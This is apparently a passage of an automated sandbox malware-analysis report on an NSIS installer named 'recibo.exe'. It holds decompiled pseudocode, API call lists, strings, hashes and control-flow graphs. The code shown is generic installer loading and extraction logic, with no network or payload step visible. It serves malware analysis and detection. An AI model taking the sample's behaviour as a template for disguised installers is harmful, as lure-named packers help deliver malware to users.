                                                                                  						_t57 = E004032B4(); // executed
                                                                                  						__eflags = _t57 - _v24;
                                                                                  						if(_t57 == _v24) {
                                                                                  							__eflags = _v44 & 0x00000001;
                                                                                  							 *0x434f10 = _t94;
                                                                                  							 *0x434f18 =  *_t94;
                                                                                  							if((_v44 & 0x00000001) != 0) {
                                                                                  								 *0x434f1c =  *0x434f1c + 1;
                                                                                  								__eflags =  *0x434f1c;
                                                                                  							}
                                                                                  							_t40 = _t94 + 0x44; // 0x44
                                                                                  							_t59 = _t40;
                                                                                  							_t85 = 8;
                                                                                  							do {
                                                                                  								_t59 = _t59 - 8;
                                                                                  								 *_t59 =  *_t59 + _t94;
                                                                                  								_t85 = _t85 - 1;
                                                                                  								__eflags = _t85;
                                                                                  							} while (_t85 != 0);
                                                                                  							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                                                  							 *(_t94 + 0x3c) = _t60;
                                                                                  							E00405FE8(0x434f20, _t94 + 4, 0x40);
                                                                                  							__eflags = 0;
                                                                                  							return 0;
                                                                                  						}
                                                                                  						goto L29;
                                                                                  					}
                                                                                  					E004034E5( *0x41ea18);
                                                                                  					_t65 = E004034CF( &_a4, 4);
                                                                                  					__eflags = _t65;
                                                                                  					if(_t65 == 0) {
                                                                                  						goto L29;
                                                                                  					}
                                                                                  					__eflags = _v12 - _a4;
                                                                                  					if(_v12 != _a4) {
                                                                                  						goto L29;
                                                                                  					}
                                                                                  					goto L28;
                                                                                  				} else {
                                                                                  					do {
                                                                                  						_t90 = _t93;
                                                                                  						asm("sbb eax, eax");
                                                                                  						_t70 = ( ~( *0x434f14) & 0x00007e00) + 0x200;
                                                                                  						__eflags = _t93 - _t70;
                                                                                  						if(_t93 >= _t70) {
                                                                                  							_t90 = _t70;
                                                                                  						}
                                                                                  						_t71 = E004034CF(0x416a18, _t90);
                                                                                  						__eflags = _t71;
                                                                                  						if(_t71 == 0) {
                                                                                  							E00403019(1);
                                                                                  							L29:
                                                                                  							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                                  						}
                                                                                  						__eflags =  *0x434f14;
                                                                                  						if( *0x434f14 != 0) {
                                                                                  							__eflags = _a4 & 0x00000002;
                                                                                  							if((_a4 & 0x00000002) == 0) {
                                                                                  								E00403019(0);
                                                                                  							}
                                                                                  							goto L20;
                                                                                  						}
                                                                                  						E00405FE8( &_v44, 0x416a18, 0x1c);
                                                                                  						_t77 = _v44;
                                                                                  						__eflags = _t77 & 0xfffffff0;
                                                                                  						if((_t77 & 0xfffffff0) != 0) {
                                                                                  							goto L20;
                                                                                  						}
                                                                                  						__eflags = _v40 - 0xdeadbeef;
                                                                                  						if(_v40 != 0xdeadbeef) {
                                                                                  							goto L20;
                                                                                  						}
                                                                                  						__eflags = _v28 - 0x74736e49;
                                                                                  						if(_v28 != 0x74736e49) {
                                                                                  							goto L20;
                                                                                  						}
                                                                                  						__eflags = _v32 - 0x74666f73;
                                                                                  						if(_v32 != 0x74666f73) {
                                                                                  							goto L20;
                                                                                  						}
                                                                                  						__eflags = _v36 - 0x6c6c754e;
                                                                                  						if(_v36 != 0x6c6c754e) {
                                                                                  							goto L20;
                                                                                  						}
                                                                                  						_a4 = _a4 | _t77;
                                                                                  						_t87 =  *0x41ea18; // 0x94236
                                                                                  						 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
                                                                                  						_t80 = _v20;
                                                                                  						__eflags = _t80 - _t93;
                                                                                  						 *0x434f14 = _t87;
                                                                                  						if(_t80 > _t93) {
                                                                                  							goto L29;
                                                                                  						}
                                                                                  						__eflags = _a4 & 0x00000008;
                                                                                  						if((_a4 & 0x00000008) != 0) {
                                                                                  							L16:
                                                                                  							_v8 = _v8 + 1;
                                                                                  							_t93 = _t80 - 4;
                                                                                  							__eflags = _t90 - _t93;
                                                                                  							if(_t90 > _t93) {
                                                                                  								_t90 = _t93;
                                                                                  							}
                                                                                  							goto L20;
                                                                                  						}
                                                                                  						__eflags = _a4 & 0x00000004;
                                                                                  						if((_a4 & 0x00000004) != 0) {
                                                                                  							break;
                                                                                  						}
                                                                                  						goto L16;
                                                                                  						L20:
                                                                                  						__eflags = _t93 -  *0x42aa24; // 0x9423a
                                                                                  						if(__eflags < 0) {
                                                                                  							_v12 = E004069F7(_v12, 0x416a18, _t90);
                                                                                  						}
                                                                                  						 *0x41ea18 =  *0x41ea18 + _t90;
                                                                                  						_t93 = _t93 - _t90;
                                                                                  						__eflags = _t93;
                                                                                  					} while (_t93 != 0);
                                                                                  					_t82 = 0;
                                                                                  					__eflags = 0;
                                                                                  					goto L24;
                                                                                  				}
                                                                                  			}


                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 0040308E
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\recibo.exe,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                                                                                    • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\recibo.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                    • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,00441800,00441800,C:\Users\user\Desktop\recibo.exe,C:\Users\user\Desktop\recibo.exe,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                                                                                  • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                  • String ID: 6B$:B$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\recibo.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                                                                                  • API String ID: 2803837635-1419559267
                                                                                  • Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                                                  • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                                                                                  • Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                                                  • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 95%
                                                                                  			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                                                                  				signed int _v8;
                                                                                  				int _v12;
                                                                                  				intOrPtr _v16;
                                                                                  				long _v20;
                                                                                  				intOrPtr _v24;
                                                                                  				short _v152;
                                                                                  				void* _t65;
                                                                                  				long _t70;
                                                                                  				intOrPtr _t75;
                                                                                  				long _t76;
                                                                                  				intOrPtr _t77;
                                                                                  				void* _t78;
                                                                                  				int _t88;
                                                                                  				intOrPtr _t92;
                                                                                  				intOrPtr _t95;
                                                                                  				long _t96;
                                                                                  				signed int _t97;
                                                                                  				int _t98;
                                                                                  				int _t99;
                                                                                  				intOrPtr _t100;
                                                                                  				void* _t101;
                                                                                  				void* _t102;
                                                                                  
                                                                                  				_t97 = _a16;
                                                                                  				_t92 = _a12;
                                                                                  				_v12 = _t97;
                                                                                  				if(_t92 == 0) {
                                                                                  					_v12 = 0x8000;
                                                                                  				}
                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                  				_v16 = _t92;
                                                                                  				if(_t92 == 0) {
                                                                                  					_v16 = 0x422a20;
                                                                                  				}
                                                                                  				_t62 = _a4;
                                                                                  				if(_a4 >= 0) {
                                                                                  					E004034E5( *0x434f58 + _t62);
                                                                                  				}
                                                                                  				if(E004034CF( &_a16, 4) == 0) {
                                                                                  					L41:
                                                                                  					_push(0xfffffffd);
                                                                                  					goto L42;
                                                                                  				} else {
                                                                                  					if((_a19 & 0x00000080) == 0) {
                                                                                  						if(_t92 != 0) {
                                                                                  							if(_a16 < _t97) {
                                                                                  								_t97 = _a16;
                                                                                  							}
                                                                                  							if(E004034CF(_t92, _t97) != 0) {
                                                                                  								_v8 = _t97;
                                                                                  								L44:
                                                                                  								return _v8;
                                                                                  							} else {
                                                                                  								goto L41;
                                                                                  							}
                                                                                  						}
                                                                                  						if(_a16 <= _t92) {
                                                                                  							goto L44;
                                                                                  						}
                                                                                  						_t88 = _v12;
                                                                                  						while(1) {
                                                                                  							_t98 = _a16;
                                                                                  							if(_a16 >= _t88) {
                                                                                  								_t98 = _t88;
                                                                                  							}
                                                                                  							if(E004034CF(0x41ea20, _t98) == 0) {
                                                                                  								goto L41;
                                                                                  							}
                                                                                  							if(E004060DF(_a8, 0x41ea20, _t98) == 0) {
                                                                                  								L28:
                                                                                  								_push(0xfffffffe);
                                                                                  								L42:
                                                                                  								_pop(_t65);
                                                                                  								return _t65;
                                                                                  							}
                                                                                  							_v8 = _v8 + _t98;
                                                                                  							_a16 = _a16 - _t98;
                                                                                  							if(_a16 > 0) {
                                                                                  								continue;
                                                                                  							}
                                                                                  							goto L44;
                                                                                  						}
                                                                                  						goto L41;
                                                                                  					}
                                                                                  					_t70 = GetTickCount();
                                                                                  					 *0x40d384 =  *0x40d384 & 0x00000000;
                                                                                  					 *0x40d380 =  *0x40d380 & 0x00000000;
                                                                                  					_t14 =  &_a16;
                                                                                  					 *_t14 = _a16 & 0x7fffffff;
                                                                                  					_v20 = _t70;
                                                                                  					 *0x40ce68 = 8;
                                                                                  					 *0x416a10 = 0x40ea08;
                                                                                  					 *0x416a0c = 0x40ea08;
                                                                                  					 *0x416a08 = 0x416a08;
                                                                                  					_a4 = _a16;
                                                                                  					if( *_t14 <= 0) {
                                                                                  						goto L44;
                                                                                  					} else {
                                                                                  						goto L9;
                                                                                  					}
                                                                                  					while(1) {
                                                                                  						L9:
                                                                                  						_t99 = 0x4000;
                                                                                  						if(_a16 < 0x4000) {
                                                                                  							_t99 = _a16;
                                                                                  						}
                                                                                  						if(E004034CF(0x41ea20, _t99) == 0) {
                                                                                  							goto L41;
                                                                                  						}
                                                                                  						_a16 = _a16 - _t99;
                                                                                  						 *0x40ce58 = 0x41ea20;
                                                                                  						 *0x40ce5c = _t99;
                                                                                  						while(1) {
                                                                                  							_t95 = _v16;
                                                                                  							 *0x40ce60 = _t95;
                                                                                  							 *0x40ce64 = _v12;
                                                                                  							_t75 = E00406A65(0x40ce58);
                                                                                  							_v24 = _t75;
                                                                                  							if(_t75 < 0) {
                                                                                  								break;
                                                                                  							}
                                                                                  							_t100 =  *0x40ce60; // 0x4231b5
                                                                                  							_t101 = _t100 - _t95;
                                                                                  							_t76 = GetTickCount();
                                                                                  							_t96 = _t76;
                                                                                  							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
                                                                                  								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                                                  								_t102 = _t102 + 0xc;
                                                                                  								E0040559F(0,  &_v152); // executed
                                                                                  								_v20 = _t96;
                                                                                  							}
                                                                                  							if(_t101 == 0) {
                                                                                  								if(_a16 > 0) {
                                                                                  									goto L9;
                                                                                  								}
                                                                                  								goto L44;
                                                                                  							} else {
                                                                                  								if(_a12 != 0) {
                                                                                  									_t77 =  *0x40ce60; // 0x4231b5
                                                                                  									_v8 = _v8 + _t101;
                                                                                  									_v12 = _v12 - _t101;
                                                                                  									_v16 = _t77;
                                                                                  									L23:
                                                                                  									if(_v24 != 1) {
                                                                                  										continue;
                                                                                  									}
                                                                                  									goto L44;
                                                                                  								}
                                                                                  								_t78 = E004060DF(_a8, _v16, _t101); // executed
                                                                                  								if(_t78 == 0) {
                                                                                  									goto L28;
                                                                                  								}
                                                                                  								_v8 = _v8 + _t101;
                                                                                  								goto L23;
                                                                                  							}
                                                                                  						}
                                                                                  						_push(0xfffffffc);
                                                                                  						goto L42;
                                                                                  					}
                                                                                  					goto L41;
                                                                                  				}
                                                                                  			}


























                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CountTick$wsprintf
                                                                                  • String ID: *B$ A$ A$... %d%%$}8@
                                                                                  • API String ID: 551687249-3029848762
                                                                                  • Opcode ID: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                                                  • Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
                                                                                  • Opcode Fuzzy Hash: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                                                  • Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 790 40176f-401794 call 402da6 call 405e83 795 401796-40179c call 40653d 790->795 796 40179e-4017b0 call 40653d call 405e0c lstrcatW 790->796 802 4017b5-4017b6 call 4067c4 795->802 796->802 805 4017bb-4017bf 802->805 806 4017c1-4017cb call 406873 805->806 807 4017f2-4017f5 805->807 815 4017dd-4017ef 806->815 816 4017cd-4017db CompareFileTime 806->816 809 4017f7-4017f8 call 406008 807->809 810 4017fd-401819 call 40602d 807->810 809->810 817 40181b-40181e 810->817 818 40188d-4018b6 call 40559f call 4032b4 810->818 815->807 816->815 819 401820-40185e call 40653d * 2 call 40657a call 40653d call 405b9d 817->819 820 40186f-401879 call 40559f 817->820 832 4018b8-4018bc 818->832 833 4018be-4018ca SetFileTime 818->833 819->805 854 401864-401865 819->854 830 401882-401888 820->830 834 402c33 830->834 832->833 836 4018d0-4018db CloseHandle 832->836 833->836 840 402c35-402c39 834->840 838 4018e1-4018e4 836->838 839 402c2a-402c2d 836->839 842 4018e6-4018f7 call 40657a lstrcatW 838->842 843 4018f9-4018fc call 40657a 838->843 839->834 848 401901-402398 842->848 843->848 852 40239d-4023a2 848->852 853 402398 call 405b9d 848->853 852->840 853->852 854->830 855 401867-401868 854->855 855->820
                                                                                  C-Code - Quality: 75%
                                                                                  			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                                                  				void* __esi;
                                                                                  				void* _t35;
                                                                                  				void* _t43;
                                                                                  				void* _t45;
                                                                                  				FILETIME* _t51;
                                                                                  				FILETIME* _t64;
                                                                                  				void* _t66;
                                                                                  				signed int _t72;
                                                                                  				FILETIME* _t73;
                                                                                  				FILETIME* _t77;
                                                                                  				signed int _t79;
                                                                                  				WCHAR* _t81;
                                                                                  				void* _t83;
                                                                                  				void* _t84;
                                                                                  				void* _t86;
                                                                                  
                                                                                  				_t77 = __ebx;
                                                                                  				 *(_t86 - 8) = E00402DA6(0x31);
                                                                                  				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                                                                  				_t35 = E00405E83( *(_t86 - 8));
                                                                                  				_push( *(_t86 - 8));
                                                                                  				_t81 = L"Call";
                                                                                  				if(_t35 == 0) {
                                                                                  					lstrcatW(E00405E0C(E0040653D(_t81, 0x441000)), ??);
                                                                                  				} else {
                                                                                  					E0040653D();
                                                                                  				}
                                                                                  				E004067C4(_t81);
                                                                                  				while(1) {
                                                                                  					__eflags =  *(_t86 + 8) - 3;
                                                                                  					if( *(_t86 + 8) >= 3) {
                                                                                  						_t66 = E00406873(_t81);
                                                                                  						_t79 = 0;
                                                                                  						__eflags = _t66 - _t77;
                                                                                  						if(_t66 != _t77) {
                                                                                  							_t73 = _t66 + 0x14;
                                                                                  							__eflags = _t73;
                                                                                  							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                                                                  						}
                                                                                  						asm("sbb eax, eax");
                                                                                  						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                                                  						__eflags = _t72;
                                                                                  						 *(_t86 + 8) = _t72;
                                                                                  					}
                                                                                  					__eflags =  *(_t86 + 8) - _t77;
                                                                                  					if( *(_t86 + 8) == _t77) {
                                                                                  						E00406008(_t81);
                                                                                  					}
                                                                                  					__eflags =  *(_t86 + 8) - 1;
                                                                                  					_t43 = E0040602D(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                                                  					__eflags = _t43 - 0xffffffff;
                                                                                  					 *(_t86 - 0x38) = _t43;
                                                                                  					if(_t43 != 0xffffffff) {
                                                                                  						break;
                                                                                  					}
                                                                                  					__eflags =  *(_t86 + 8) - _t77;
                                                                                  					if( *(_t86 + 8) != _t77) {
                                                                                  						E0040559F(0xffffffe2,  *(_t86 - 8));
                                                                                  						__eflags =  *(_t86 + 8) - 2;
                                                                                  						if(__eflags == 0) {
                                                                                  							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                                                  						}
                                                                                  						L31:
                                                                                  						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
                                                                                  						__eflags =  *0x434f88;
                                                                                  						goto L32;
                                                                                  					} else {
                                                                                  						E0040653D("C:\Users\Arthur\AppData\Local\Temp\nsf321E.tmp", _t83);
                                                                                  						E0040653D(_t83, _t81);
                                                                                  						E0040657A(_t77, _t81, _t83, "C:\Users\Arthur\AppData\Local\Temp\nsf321E.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
                                                                                  						E0040653D(_t83, "C:\Users\Arthur\AppData\Local\Temp\nsf321E.tmp");
                                                                                  						_t64 = E00405B9D("C:\Users\Arthur\AppData\Local\Temp\nsf321E.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
                                                                                  						__eflags = _t64;
                                                                                  						if(_t64 == 0) {
                                                                                  							continue;
                                                                                  						} else {
                                                                                  							__eflags = _t64 == 1;
                                                                                  							if(_t64 == 1) {
                                                                                  								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
                                                                                  								L32:
                                                                                  								_t51 = 0;
                                                                                  								__eflags = 0;
                                                                                  							} else {
                                                                                  								_push(_t81);
                                                                                  								_push(0xfffffffa);
                                                                                  								E0040559F();
                                                                                  								L29:
                                                                                  								_t51 = 0x7fffffff;
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  					L33:
                                                                                  					return _t51;
                                                                                  				}
                                                                                  				E0040559F(0xffffffea,  *(_t86 - 8)); // executed
                                                                                  				 *0x434fb4 =  *0x434fb4 + 1;
                                                                                  				_t45 = E004032B4( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                                                                                  				 *0x434fb4 =  *0x434fb4 - 1;
                                                                                  				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                                                                  				_t84 = _t45;
                                                                                  				if( *(_t86 - 0x24) != 0xffffffff) {
                                                                                  					L22:
                                                                                  					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                                                                  				} else {
                                                                                  					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                                                                  					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                                                                  						goto L22;
                                                                                  					}
                                                                                  				}
                                                                                  				CloseHandle( *(_t86 - 0x38)); // executed
                                                                                  				__eflags = _t84 - _t77;
                                                                                  				if(_t84 >= _t77) {
                                                                                  					goto L31;
                                                                                  				} else {
                                                                                  					__eflags = _t84 - 0xfffffffe;
                                                                                  					if(_t84 != 0xfffffffe) {
                                                                                  						E0040657A(_t77, _t81, _t84, _t81, 0xffffffee);
                                                                                  					} else {
                                                                                  						E0040657A(_t77, _t81, _t84, _t81, 0xffffffe9);
                                                                                  						lstrcatW(_t81,  *(_t86 - 8));
                                                                                  					}
                                                                                  					_push(0x200010);
                                                                                  					_push(_t81);
                                                                                  					E00405B9D();
                                                                                  					goto L29;
                                                                                  				}
                                                                                  				goto L33;
                                                                                  			}



















                                                                                  APIs
                                                                                  • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00441000,?,?,00000031), ref: 004017D5
                                                                                    • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                                    • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,00000000,004231B5,773423A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                    • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,00000000,004231B5,773423A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                    • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,00403418), ref: 004055FA
                                                                                    • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll), ref: 0040560C
                                                                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsf321E.tmp$C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll$Call
                                                                                  • API String ID: 1941528284-3438832539
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 856 40559f-4055b4 857 4055ba-4055cb 856->857 858 40566b-40566f 856->858 859 4055d6-4055e2 lstrlenW 857->859 860 4055cd-4055d1 call 40657a 857->860 862 4055e4-4055f4 lstrlenW 859->862 863 4055ff-405603 859->863 860->859 862->858 864 4055f6-4055fa lstrcatW 862->864 865 405612-405616 863->865 866 405605-40560c SetWindowTextW 863->866 864->863 867 405618-40565a SendMessageW * 3 865->867 868 40565c-40565e 865->868 866->865 867->868 868->858 869 405660-405663 868->869 869->858
                                                                                  C-Code - Quality: 100%
                                                                                  			E0040559F(signed int _a4, WCHAR* _a8) {
                                                                                  				struct HWND__* _v8;
                                                                                  				signed int _v12;
                                                                                  				WCHAR* _v32;
                                                                                  				long _v44;
                                                                                  				int _v48;
                                                                                  				void* _v52;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				void* __esi;
                                                                                  				WCHAR* _t27;
                                                                                  				signed int _t28;
                                                                                  				long _t29;
                                                                                  				signed int _t37;
                                                                                  				signed int _t38;
                                                                                  
                                                                                  				_t27 =  *0x433ee4; // 0x10442
                                                                                  				_v8 = _t27;
                                                                                  				if(_t27 != 0) {
                                                                                  					_t37 =  *0x434fb4;
                                                                                  					_v12 = _t37;
                                                                                  					_t38 = _t37 & 0x00000001;
                                                                                  					if(_t38 == 0) {
                                                                                  						E0040657A(_t38, 0, 0x42c248, 0x42c248, _a4);
                                                                                  					}
                                                                                  					_t27 = lstrlenW(0x42c248);
                                                                                  					_a4 = _t27;
                                                                                  					if(_a8 == 0) {
                                                                                  						L6:
                                                                                  						if((_v12 & 0x00000004) == 0) {
                                                                                  							_t27 = SetWindowTextW( *0x433ec8, 0x42c248); // executed
                                                                                  						}
                                                                                  						if((_v12 & 0x00000002) == 0) {
                                                                                  							_v32 = 0x42c248;
                                                                                  							_v52 = 1;
                                                                                  							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
                                                                                  							_v44 = 0;
                                                                                  							_v48 = _t29 - _t38;
                                                                                  							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
                                                                                  							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
                                                                                  						}
                                                                                  						if(_t38 != 0) {
                                                                                  							_t28 = _a4;
                                                                                  							0x42c248[_t28] = 0;
                                                                                  							return _t28;
                                                                                  						}
                                                                                  					} else {
                                                                                  						_t27 = lstrlenW(_a8) + _a4;
                                                                                  						if(_t27 < 0x1000) {
                                                                                  							_t27 = lstrcatW(0x42c248, _a8);
                                                                                  							goto L6;
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				return _t27;
                                                                                  			}


















                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,00000000,004231B5,773423A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                  • lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,00000000,004231B5,773423A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                  • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,00403418), ref: 004055FA
                                                                                  • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll), ref: 0040560C
                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                    • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                    • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,00000000), ref: 00406779
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
